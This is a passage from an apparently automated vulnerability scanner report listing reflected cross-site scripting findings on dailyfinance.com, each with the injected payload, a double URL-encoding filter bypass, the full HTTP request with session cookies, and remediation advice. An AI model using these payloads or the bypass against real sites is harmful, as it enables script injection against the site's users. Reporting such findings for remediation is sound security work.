Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /to-go/?69fff"-alert(1)-"73c848d5aee=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createElement('script'); s.type = 'text/javascript'; s.src = ...[SNIP]...
1.484. http://www.dailyfinance.com/wire/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.dailyfinance.com
Path:
/wire/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d1765"-alert(1)-"31f006db44a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /wire/?d1765"-alert(1)-"31f006db44a=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createElement('script'); s.type = 'text/javascript'; s.src = ...[SNIP]...
1.485. http://www.dailyfinance.com/wire/ap/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.dailyfinance.com
Path:
/wire/ap/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d89b9"-alert(1)-"395f81e262d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /wire/ap/?d89b9"-alert(1)-"395f81e262d=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createElement('script'); s.type = 'text/javascript'; s.src = ...[SNIP]...
1.486. http://www.dailyfinance.com/wire/page/2/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.dailyfinance.com
Path:
/wire/page/2/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 790a0"-alert(1)-"24789c2b648 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /wire/page/2/?790a0"-alert(1)-"24789c2b648=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createElement('script'); s.type = 'text/javascript'; s.src = ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5609d"><img%20src%3da%20onerror%3dalert(1)>06257ecfc9d was submitted in the REST URL parameter 2. This input was echoed as 5609d"><img src=a onerror=alert(1)>06257ecfc9d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /writers/abigail-field5609d"><img%20src%3da%20onerror%3dalert(1)>06257ecfc9d/ HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a9d7d%2522%253bf4f13e83af2 was submitted in the REST URL parameter 2. This input was echoed as a9d7d";f4f13e83af2 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /writers/abigail-fielda9d7d%2522%253bf4f13e83af2/ HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
1.489. http://www.dailyfinance.com/writers/abigail-field/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.dailyfinance.com
Path:
/writers/abigail-field/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6712c"-alert(1)-"1a706dc858a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /writers/abigail-field/?6712c"-alert(1)-"1a706dc858a=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createElement('script'); s.type = 'text/javascript'; s.src = ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a62fa%2522%253b07c35429eb4 was submitted in the REST URL parameter 2. This input was echoed as a62fa";07c35429eb4 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /writers/annabelle-gurwitcha62fa%2522%253b07c35429eb4/ HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3beb9"><img%20src%3da%20onerror%3dalert(1)>66beaca10e2 was submitted in the REST URL parameter 2. This input was echoed as 3beb9"><img src=a onerror=alert(1)>66beaca10e2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /writers/annabelle-gurwitch3beb9"><img%20src%3da%20onerror%3dalert(1)>66beaca10e2/ HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http:/ ...[SNIP]... <meta property="og:title" content="Annabelle Gurwitch3beb9"><img Src=a Onerror=alert(1)>66beaca10e2" /> ...[SNIP]...
1.492. http://www.dailyfinance.com/writers/annabelle-gurwitch/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.dailyfinance.com
Path:
/writers/annabelle-gurwitch/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f6417"-alert(1)-"b509b513d43 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /writers/annabelle-gurwitch/?f6417"-alert(1)-"b509b513d43=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createElement('script'); s.type = 'text/javascript'; s.src = ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a18e1"><img%20src%3da%20onerror%3dalert(1)>0f23daf9f53 was submitted in the REST URL parameter 2. This input was echoed as a18e1"><img src=a onerror=alert(1)>0f23daf9f53 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /writers/bruce-watsona18e1"><img%20src%3da%20onerror%3dalert(1)>0f23daf9f53/ HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3dfe1%2522%253b363edcc705b was submitted in the REST URL parameter 2. This input was echoed as 3dfe1";363edcc705b in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /writers/bruce-watson3dfe1%2522%253b363edcc705b/ HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
1.495. http://www.dailyfinance.com/writers/bruce-watson/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.dailyfinance.com
Path:
/writers/bruce-watson/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e0e22"-alert(1)-"858a68f9be2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /writers/bruce-watson/?e0e22"-alert(1)-"858a68f9be2=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createElement('script'); s.type = 'text/javascript'; s.src = ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6fe3e"><img%20src%3da%20onerror%3dalert(1)>8ba5f9eb009 was submitted in the REST URL parameter 2. This input was echoed as 6fe3e"><img src=a onerror=alert(1)>8ba5f9eb009 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /writers/dawn-kawamoto6fe3e"><img%20src%3da%20onerror%3dalert(1)>8ba5f9eb009/ HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a650c%2522%253b7f03a103ab3 was submitted in the REST URL parameter 2. This input was echoed as a650c";7f03a103ab3 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /writers/dawn-kawamotoa650c%2522%253b7f03a103ab3/ HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
1.498. http://www.dailyfinance.com/writers/dawn-kawamoto/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.dailyfinance.com
Path:
/writers/dawn-kawamoto/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cac23"-alert(1)-"933f44c6d8d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /writers/dawn-kawamoto/?cac23"-alert(1)-"933f44c6d8d=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createElement('script'); s.type = 'text/javascript'; s.src = ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 52cd9%2522%253b4d5e9d4b641 was submitted in the REST URL parameter 2. This input was echoed as 52cd9";4d5e9d4b641 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /writers/gene-marcial52cd9%2522%253b4d5e9d4b641/ HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ff73"><img%20src%3da%20onerror%3dalert(1)>401196f4fd2 was submitted in the REST URL parameter 2. This input was echoed as 7ff73"><img src=a onerror=alert(1)>401196f4fd2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /writers/gene-marcial7ff73"><img%20src%3da%20onerror%3dalert(1)>401196f4fd2/ HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http:/ ...[SNIP]... <meta property="og:title" content="Gene Marcial7ff73"><img Src=a Onerror=alert(1)>401196f4fd2" /> ...[SNIP]...
1.501. http://www.dailyfinance.com/writers/gene-marcial/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.dailyfinance.com
Path:
/writers/gene-marcial/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 267aa"-alert(1)-"708541160 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /writers/gene-marcial/?267aa"-alert(1)-"708541160=1 HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createElement('script'); s.type = 'text/javascript'; s.src = ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ccb17"><img%20src%3da%20onerror%3dalert(1)>94d7abd786 was submitted in the REST URL parameter 2. This input was echoed as ccb17"><img src=a onerror=alert(1)>94d7abd786 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /writers/jean-chatzkyccb17"><img%20src%3da%20onerror%3dalert(1)>94d7abd786/ HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ae752%2522%253bb011634ed1d was submitted in the REST URL parameter 2. This input was echoed as ae752";b011634ed1d in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /writers/jean-chatzkyae752%2522%253bb011634ed1d/ HTTP/1.1 Host: www.dailyfinance.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
1.504. http://www.dailyfinance.com/writers/jean-chatzky/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.dailyfinance.com
Path:
/writers/jean-chatzky/
Issue detail
